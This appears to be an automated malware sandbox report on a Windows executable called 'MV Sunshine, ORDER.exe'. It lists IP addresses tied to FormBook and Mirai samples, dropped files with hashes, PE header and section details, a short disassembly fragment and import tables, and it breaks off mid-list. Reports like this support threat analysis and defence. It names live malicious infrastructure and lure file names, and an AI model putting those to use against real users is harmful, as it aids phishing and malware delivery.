                    • 213.145.228.16
                    bJrO2iUerN.elfGet hashmaliciousUnknownBrowse
                    • 213.145.228.16
                    TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                    • 213.145.228.16
                    Attendance list.exeGet hashmaliciousFormBookBrowse
                    • 213.145.228.16
                    Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                    • 213.145.228.16
                    Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                    • 213.145.228.16
                    1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                    • 213.145.228.16
                    Payment Details- scanslip000002343.exeGet hashmaliciousFormBookBrowse
                    • 213.145.228.16
                    DRAFT DOCS RSHA25491003.exeGet hashmaliciousFormBookBrowse
                    • 213.145.228.16
                    VPSQUANUSPAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                    • 23.251.54.212
                    v9.exeGet hashmaliciousUnknownBrowse
                    • 154.222.224.99
                    1.exeGet hashmaliciousUnknownBrowse
                    • 154.222.224.99
                    v9.exeGet hashmaliciousUnknownBrowse
                    • 154.222.224.99
                    bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                    • 69.165.74.76
                    bot.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                    • 69.165.74.76
                    bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                    • 69.165.74.76
                    bot.ppc.elfGet hashmaliciousMirai, OkiruBrowse
                    • 69.165.74.76
                    bot.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                    • 69.165.74.175
                    bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                    • 69.165.74.175
                    PROVIDERBOXIPv4IPv6DUS1DEPAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                    • 5.44.111.162
                    RAbSVWi6Lh.elfGet hashmaliciousMiraiBrowse
                    • 91.206.143.156
                    Yb6ztdvQaB.elfGet hashmaliciousUnknownBrowse
                    • 93.90.186.36
                    5Jan3SztHt.elfGet hashmaliciousUnknownBrowse
                    • 5.44.126.238
                    docs_pdf.exeGet hashmaliciousFormBookBrowse
                    • 5.44.111.162
                    TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                    • 5.44.111.162
                    Attendance list.exeGet hashmaliciousFormBookBrowse
                    • 5.44.111.162
                    62c.jsGet hashmaliciousUnknownBrowse
                    • 5.44.111.28
                    62c.jsGet hashmaliciousUnknownBrowse
                    • 5.44.111.28
                    z8s945rPmZ.exeGet hashmaliciousSystemBCBrowse
                    • 5.44.111.104
                    LOOPIASEPAYROLL SUMMARY _pdf.exeGet hashmaliciousFormBookBrowse
                    • 194.9.94.85
                    http://tok2np0cklt.top/Get hashmaliciousUnknownBrowse
                    • 194.9.94.85
                    docs_pdf.exeGet hashmaliciousFormBookBrowse
                    • 194.9.94.85
                    TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                    • 194.9.94.85
                    Attendance list.exeGet hashmaliciousFormBookBrowse
                    • 194.9.94.85
                    Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                    • 194.9.94.85
                    Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                    • 194.9.94.86
                    Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                    • 194.9.94.85
                    Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                    • 194.9.94.85
                    TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                    • 194.9.94.85
                    No context
                    No context
                    Process:C:\Windows\SysWOW64\clip.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                    Category:dropped
                    Size (bytes):114688
                    Entropy (8bit):0.9746603542602881
                    Encrypted:false
                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\MV Sunshine, ORDER.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270848
                    Entropy (8bit):7.994661897514812
                    Encrypted:true
                    SSDEEP:6144:WAz0p8gLA+2QqFAd67JtVxxHTHEiHjBa74oD0mS2Mg25r2fxPhw:xgp8OrqFlJtDpTHEyjBa0n4f25r25Zw
                    MD5:4E2A8F508B892048920CB5F1A50F7551
                    SHA1:2542954F1007EA884A8D63043B6F67D94BF2FFF1
                    SHA-256:5E779D8DC0DDF290AB88CC5A6210A2D4EE738B835D84A5C7A8A7A1698C7580EF
                    SHA-512:6FB1C638A4A7BB7D5411AC644E434027A0991F4011503896A2B1395C088AD56EA1C8E2196735F44BCB0E08F8252BD26417ADC5624C34A9F05554B2F4DE951563
                    Malicious:false
                    Reputation:low
                    Preview:..}k.8H6A..._......JM..qQ0..H6AH97VJC2N3IJNJNBYR89F8H6AH97.JC2@,.DN.G.x.9u...^(;.G$%$@/^i)/$ --rZ\fJ=Xa!W.....#\-/`GCH}R89F8H68I0.k*$.sS..s*).C...|X/.[..j*$.T..r*)..;[Q{X/.AH97VJC2.vIJ.KOBH..YF8H6AH97.JA3E2BJNZJBYR89F8H6a]97VZC2N.MJNJ.BYB89F:H6GH97VJC2H3IJNJNBYr<9F:H6AH97TJ..N3YJNZNBYR(9F(H6AH97FJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBw&]A28H6.G=7VZC2N#MJNZNBYR89F8H6AH97vJCRN3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2
                    Process:C:\Users\user\Desktop\MV Sunshine, ORDER.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):9784
                    Entropy (8bit):7.634569270872405
                    Encrypted:false
                    SSDEEP:192:CZIUd07023mEBuHJLzyvek8KIqvJK92pzi4kR7WXZDZb/2CnE9:Yd07ZuhzEeoIqvJKwklW5ZT/nE9
                    MD5:9B50378F2912AE42FFE42B464F23D65E
                    SHA1:20417AA75ACE5CD4F66198B6E299A6AE1124A1B5
                    SHA-256:5F0716B312685EA484E95D17F12493BF99C24B19174FD46F35BE051977AA7472
                    SHA-512:2047874AA1B5BADF37BE66B83D0BEBC4AC7B7E145E3B5DD60A2B942E6A2E4394102C85BBBE8ABB46B09BB97AE77AEF61E1AFFF9DA178759F6FDFB1088196A50E
                    Malicious:false
                    Reputation:low
                    Preview:EA06..p..^..y..e.L..[-.e4....y..sd.N,....e8.N.si..md..&..]....9...K........|.0.o..d..,......:..@..;.Y'sP.......4.Z..o;..6.`.o.p..Y@.....g.;..f.P..Y@...N..i.........;......r.'Sy...c ....Ac.H.....(.F.3<..Y..6...4.d........x..n....Bv.....X. 0....+$.r...Y..5_..l.....5_..t.U..`5_....U...5_..d.U...5\..>30..N.^.c.Z..o8.z..s8......@.....s...G. /Z.N'`.....jv....r.u....$.../.s:...g G_T......l.>_.......zo7.........s@.......@...........`.M..`... ...e...@..8.'.6.Y.{>K$..c.M.`..Y'.._..t......>K #G.d..3|vY..G.6.Yf.8_..oe..i|vY....e.h.,.0......-..9.M..kE...Ng.P;..:.N..P.L..6...f..+(.ffvI...8.N.....f.@.E...Y....3.i.....N@......vi.....P.....2p....<d....,vf........N.!+(.'&`....,fs4...I.......r.4.X...c3.4.ih.Y.!...Gf.....,f.;.... .#9.....c.P........t.h.s.....,vj...$..t.L....40.....f....N.s....4..@.6.-..p..S.=..4...SP.N...;7.`..;.M.....o:.....c.p..Y.s.wx.....vp........E....N.y6....p.c3.5..6..b.!....F ...@B5e.Mgs........vr......fV[5.v...B3p....;:.X...c.NA..0........g@....&.<..e...
                    Process:C:\Users\user\Desktop\MV Sunshine, ORDER.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):270848
                    Entropy (8bit):7.994661897514812
                    Encrypted:true
                    SSDEEP:6144:WAz0p8gLA+2QqFAd67JtVxxHTHEiHjBa74oD0mS2Mg25r2fxPhw:xgp8OrqFlJtDpTHEyjBa0n4f25r25Zw
                    MD5:4E2A8F508B892048920CB5F1A50F7551
                    SHA1:2542954F1007EA884A8D63043B6F67D94BF2FFF1
                    SHA-256:5E779D8DC0DDF290AB88CC5A6210A2D4EE738B835D84A5C7A8A7A1698C7580EF
                    SHA-512:6FB1C638A4A7BB7D5411AC644E434027A0991F4011503896A2B1395C088AD56EA1C8E2196735F44BCB0E08F8252BD26417ADC5624C34A9F05554B2F4DE951563
                    Malicious:false
                    Reputation:low
                    Preview:..}k.8H6A..._......JM..qQ0..H6AH97VJC2N3IJNJNBYR89F8H6AH97.JC2@,.DN.G.x.9u...^(;.G$%$@/^i)/$ --rZ\fJ=Xa!W.....#\-/`GCH}R89F8H68I0.k*$.sS..s*).C...|X/.[..j*$.T..r*)..;[Q{X/.AH97VJC2.vIJ.KOBH..YF8H6AH97.JA3E2BJNZJBYR89F8H6a]97VZC2N.MJNJ.BYB89F:H6GH97VJC2H3IJNJNBYr<9F:H6AH97TJ..N3YJNZNBYR(9F(H6AH97FJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBw&]A28H6.G=7VZC2N#MJNZNBYR89F8H6AH97vJCRN3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2N3IJNJNBYR89F8H6AH97VJC2
                    Process:C:\Users\user\Desktop\MV Sunshine, ORDER.exe
                    File Type:FGDC-STD-001-1998
                    Category:dropped
                    Size (bytes):28674
                    Entropy (8bit):3.5854309016086123
                    Encrypted:false
                    SSDEEP:768:PQKGjwsMMIfexWN+m2cJ9soGbLph1jXtAP:PRhsMffexWEXtg
                    MD5:66DF8D943FB7524F2C217CA743A00AF8
                    SHA1:37ACD52CF6A2271DAD61261D944649425EE5AA27
                    SHA-256:426BD89EDCB1A56CEA3A61B05961D720E7C7DF002E7FB8008626772AC1DCF5CD
                    SHA-512:D5B8F50E4DF27D9DEF1D34AF48F8DB820C9B119BB52FECD4C886E8559247F90585F3F7B65A769375CD710272E97A958D64E8B43122A6BFAA5F28EE675598E2CA
                    Malicious:false
                    Reputation:low
                    Preview:2z77:dge:3geee2422227879d:8d22222288:;67:6d;8722222288:;6f:8dc9422222288:;77::d:8g22222288:;67:cd;8722222288:;6f:edc8e22222288:;77:gd:5522222288:;67;2d;5422222288:;6f;4dc4g22222288:;77;6d:8622222288:;67;8d;8e22222288:;6f;:dc8e22222288:;77;c55e288:;67;ed;8g22222288:;:f66hhhhhhdc9622222288:;;768hhhhhhd:8622222288:;:76:hhhhhhd;8e22222288:;:f6chhhhhhdc8e22222288:;;76ehhhhhhd:4g22222288:;:76ghhhhhhd;8622222288:;:f72hhhhhhdc8e22222288:;;774hhhhhhd:8e22222288:;:776hhhhhh55e;88:;:f78hhhhhhdc9722222288:;77f2d:9522222288:;67f4d;8722222288:;6ff6dc9422222288:;77f8d:5522222288:;67f:d;5422222288:;6ffcdc4g22222288:;77fed:8622222288:;67fgd;8e22222288:;6fg2dc8e22222288:;77g455e288:;67g6d;8322222288:;:f8:hhhhhhdc8622222288:;;78chhhhhhd:9822222288:;:78ehhhhhhd;8322222288:;:f8ghhhhhhdc9222222288:;;792hhhhhhd:8;22222288:;:794hhhhhhd;5522222288:;:f96hhhhhhdc5422222288:;;798hhhhhhd:4g22222288:;:79:hhhhhhd;8622222288:;:f9chhhhhhdc8e22222288:;;79ehhhhhhd:8e22222288:;:79ghhhhhh55e;88:;6f:2dc9522222288:;77c2d:8:
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.214171798533215
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:MV Sunshine, ORDER.exe
                    File size:1'259'008 bytes
                    MD5:fbc68c0b27f383eeb5177a01d2464b74
                    SHA1:33ce6d297f5039c828f21d17c1ac6acde4b0153c
                    SHA256:8dddd8491db05ec4904bb6b6fd63ac5412b23fd89cefbf1b3c5ca74325615e8e
                    SHA512:46a746470f8dd59ede26e25fe43f15ba094d39f1db0498aac9b4f349524eb856d79ba3dd92351e46cb32b6ef13a31437c677ee4ee3420be7de72d3bf4cb54452
                    SSDEEP:24576:cAHnh+eWsN3skA4RV1Hom2KXMmHauTNv9rYCbgZH1FtsV5:7h+ZkldoPK8YauTUCbOH1Fti
                    TLSH:3545BE0273D1C036FFAB92739B6AF24556BD79254133852F13982DB9BD701B2223E663
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                    Icon Hash:aaf3e3e3938382a0
                    Entrypoint:0x42800a
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66B921D9 [Sun Aug 11 20:40:57 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:afcdf79be1557326c854b6e20cb900a7
                    Instruction
                    call 00007F63E481340Dh
                    jmp 00007F63E48061C4h
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push edi
                    push esi
                    mov esi, dword ptr [esp+10h]
                    mov ecx, dword ptr [esp+14h]
                    mov edi, dword ptr [esp+0Ch]
                    mov eax, ecx
                    mov edx, ecx
                    add eax, esi
                    cmp edi, esi
                    jbe 00007F63E480634Ah
                    cmp edi, eax
                    jc 00007F63E48066AEh
                    bt dword ptr [004C41FCh], 01h
                    jnc 00007F63E4806349h
                    rep movsb
                    jmp 00007F63E480665Ch
                    cmp ecx, 00000080h
                    jc 00007F63E4806514h
                    mov eax, edi
                    xor eax, esi
                    test eax, 0000000Fh
                    jne 00007F63E4806350h
                    bt dword ptr [004BF324h], 01h
                    jc 00007F63E4806820h
                    bt dword ptr [004C41FCh], 00000000h
                    jnc 00007F63E48064EDh
                    test edi, 00000003h
                    jne 00007F63E48064FEh
                    test esi, 00000003h
                    jne 00007F63E48064DDh
                    bt edi, 02h
                    jnc 00007F63E480634Fh
                    mov eax, dword ptr [esi]
                    sub ecx, 04h
                    lea esi, dword ptr [esi+04h]
                    mov dword ptr [edi], eax
                    lea edi, dword ptr [edi+04h]
                    bt edi, 03h
                    jnc 00007F63E4806353h
                    movq xmm1, qword ptr [esi]
                    sub ecx, 08h
                    lea esi, dword ptr [esi+08h]
                    movq qword ptr [edi], xmm1
                    lea edi, dword ptr [edi+08h]
                    test esi, 00000007h
                    je 00007F63E48063A5h
                    bt esi, 03h
                    Programming Language:
                    • [ASM] VS2013 build 21005
                    • [ C ] VS2013 build 21005
                    • [C++] VS2013 build 21005
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [ASM] VS2013 UPD5 build 40629
                    • [RES] VS2013 build 21005
                    • [LNK] VS2013 UPD5 build 40629
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x68e90.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1310000x7134.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0xc80000x68e900x6900069eb280e6fbbe08b18d483a2318c294bFalse0.9371372767857142data7.9142996288869245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x1310000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                    RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                    RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                    RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                    RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                    RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                    RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                    RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                    RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                    RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                    RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                    RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                    RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                    RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                    RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                    RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                    RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                    RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                    RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                    RT_RCDATA0xd07b80x60126data1.0003329013239817
                    RT_GROUP_ICON0x1308e00x76dataEnglishGreat Britain0.6610169491525424
                    RT_GROUP_ICON0x1309580x14dataEnglishGreat Britain1.25
                    RT_GROUP_ICON0x13096c0x14dataEnglishGreat Britain1.15
                    RT_GROUP_ICON0x1309800x14dataEnglishGreat Britain1.25
                    RT_VERSION0x1309940x10cdataEnglishGreat Britain0.5932835820895522
                    RT_MANIFEST0x130aa00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                    DLLImport
                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                    PSAPI.DLLGetProcessMemoryInfo
                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                    UxTheme.dllIsThemeActive
                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, 